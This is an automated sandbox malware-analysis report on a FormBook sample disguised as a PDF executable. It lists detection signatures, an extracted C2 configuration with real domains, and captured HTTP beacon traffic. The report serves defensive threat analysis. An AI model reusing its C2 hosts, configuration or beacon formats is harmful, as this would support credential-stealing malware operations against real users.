Windows Analysis Report
AM PROJECT PDF.exe

Overview

General Information

Sample Name: AM PROJECT PDF.exe
Analysis ID: 708243
MD5: 05069262cd099b2e37afb5afe629d12d
SHA1: 5abfb565897213b0f747fa1843822e4b8b201f7d
SHA256: ba162d7df1cd1beb851a29a69054491959d8ee6ad27f18b3e9dc57a3f6df1122
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: AM PROJECT PDF.exe ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe Metadefender: Detection: 44%
Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: AM PROJECT PDF.exe Joe Sandbox ML: detected
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.texasfirsthonda.com/rdny/"], "decoy": ["YRF12bO2pd49faW4UzTvrJzXWL/bf1MDOw==", "F4vBUcAt7jUgbXBJ", "/I/yHgE4NrnX/69c", "fVXBOjIn1JvtUbyaEA==", "US2MK5jWbG3A6UiTbTaoXA==", "hiSLAGDR+C8gbXBJ", "VPsw1ki7cFOrtbxFyp4GoPQ04vwI8w==", "+WO4/vgbq3qspGz+h2j/s/Y04vwI8w==", "SvNJK4l8SXyunkOOd2LkmhcNuF2IQbU=", "POJGLKrcxvhwrlmIRTLZewmZOaQ=", "w16DIwszB9wRUsGqeM6E2amdwg==", "bOswTj2od6cNSnANu0Mz8MA=", "eDKOBWGpQDGO+RwWemIUujLA3Ase/ZLW", "fglVcE90+x6AttuCZ0k7Jdrn1Q==", "P6/189IYImqYjDKXEOGiHBYZ", "7H3sn/0a9i3AwGr2sEMz8MA=", "uCBh7e4gOIegCrZe", "jwtUfFiKkN5IiE0O67hm2eAA", "MA+EkGiWJBuL+r3tnIVPBKz9t12IQbU=", "ZAhxAV2YsSqhqzpyT0kFfYLEqxEO", "CZcAQhkAubagCrZe", "dmPG8NQG6+s8LPYLom46Jdrn1Q==", "jx9lsKUAuq4RFahZG9iODQwO", "kjeS5tQNHn23+s+ILPw=", "43fYXwgevrWgCrZe", "G7cdOxJMS4e0MktnHgOt", "IpsZlImAquQSUbyaEA==", "vCmC1bvEmaYHBaLnskMz8MA=", "r0qvlf0B2RiCv+KISzzngQmZOaQ=", "AbkH/XVnJl3B+s+ILPw=", "4afkGvTtrrWgCrZe", "qGuk68Xk+UOU2AD5YSCIFtclwF2IQbU=", "QNI2b16JgCtXxN4=", "OeU8e1+tSpP3", "Tt5fziyMU7MjiaAdvEMz8MA=", "7q/nDgx/UpADbNeyLCGtJdrn1Q==", "vJLmHwYJxvFNgDvcZj6tJdrn1Q==", "VLbzJBZVVJKgCrZe", "ZAZl2z2TpP8vWP9lYCKl", "RMEBg3KtSpP3", "UwlMenDrv+JEhrJNIqE95LQLsl2IQbU=", "JPs7u6+Gh7zp1Hp2HNiiHBYZ", "RA9+G5LnpQgxLA==", "CfVRVDJ1Hx9JeSxsjzQpVA==", "XSGIhFqluCeDtdOBjzQpVA==", "41WhkV/leqb9", "bt0kNyuiYWHd4Xrsh0jffgmZOaQ=", "QeEv/GWWqOgWUbyaEA==", "71GKdeDmt+hLgipojzQpVA==", "xlCH91W6ng5JZRxujzQpVA==", "2Wa5Z9MMBT+v2pykSzoUQ/Av4vwI8w==", "i2HMW7v+E0x01vjejzQpVA==", "oBVQ0r+mXFSblzZujzQpVA==", "8boNjgB2S0KYDC8mzrSiHBYZ", "D7MgKRRXTnXL955OEtU43uIqr4wG", "2q8cHZeKXpPtUbyaEA==", "Jqb8LvwA1gd1rmk4EN2iHBYZ", "JK8MteSpUVzq", "gmjgsQ8sPrYwPvzzalNDJdrn1Q==", "DoO/pwsX9Al79SScEeKiHBYZ", "22Xc0Lks7StXxN4=", "5qrsR0SRK3Dk", "RB6DN6YI2+gfT2mCOiDMZpUqr4wG", "q2uwBvgkJFt87ptU"]}
Source: AM PROJECT PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: AM PROJECT PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.194.111 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: Malware configuration extractor URLs: www.texasfirsthonda.com/rdny/
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic HTTP traffic detected: GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1Host: www.fellyhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1Host: www.soraligne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 67 78 58 73 31 41 6d 44 2d 4c 4b 78 76 70 6a 70 54 65 62 71 56 4b 42 4b 51 75 36 55 50 35 77 44 30 57 7a 69 6b 75 71 78 37 79 4e 5a 72 65 6a 57 4e 54 4c 38 4a 36 71 7a 5f 6c 5f 38 31 30 38 55 4c 42 42 39 48 73 51 53 6f 31 76 4a 59 6e 73 77 2d 37 4d 77 41 35 44 58 71 7e 6c 76 44 4b 53 51 5a 6b 4c 50 7a 52 56 63 41 6e 6b 32 59 70 67 65 61 52 57 4d 63 35 47 51 33 66 6f 39 48 31 4f 71 49 47 65 4a 6c 52 37 36 70 32 74 4b 63 51 69 6c 50 74 4d 65 6c 73 4d 28 54 6a 65 55 59 6c 64 5a 63 5a 77 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNgxXs1AmD-LKxvpjpTebqVKBKQu6UP5wD0Wzikuqx7yNZrejWNTL8J6qz_l_8108ULBB9HsQSo1vJYnsw-7MwA5DXq~lvDKSQZkLPzRVcAnk2YpgeaRWMc5GQ3fo9H1OqIGeJlR76p2tKcQilPtMelsM(TjeUYldZcZwpA).
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 5333Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 23 Sep 2022 06:02:05 GMTContent-Type: text/htmlContent-Length: 291ETag: "6324a85f-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: AM PROJECT PDF.exe String found in binary or memory: http://github.com/CJxD/CoreView
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-1.12.4.min.js?ver=191202
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-migrate-1.4.1.min.js?ver=191202
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=1
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=2
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=4
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=5
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=6
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=company
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=privacy
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=provision
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/free.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/gallery.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/login_check.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/notice.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/password_lost.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/qa.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/register.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/html5.js
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/jquery-1.12.4.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/jquery-migrate-1.4.1.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/placeholders.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/wrest.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/plugin/pwa/images/icons/icon-72x72.png
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/dark.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/tailwind.min.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/img/main_bn.jpg
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/jquery.menu.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/sweetalert2.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/skin/latest/pic_list/style.css?ver=220620
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
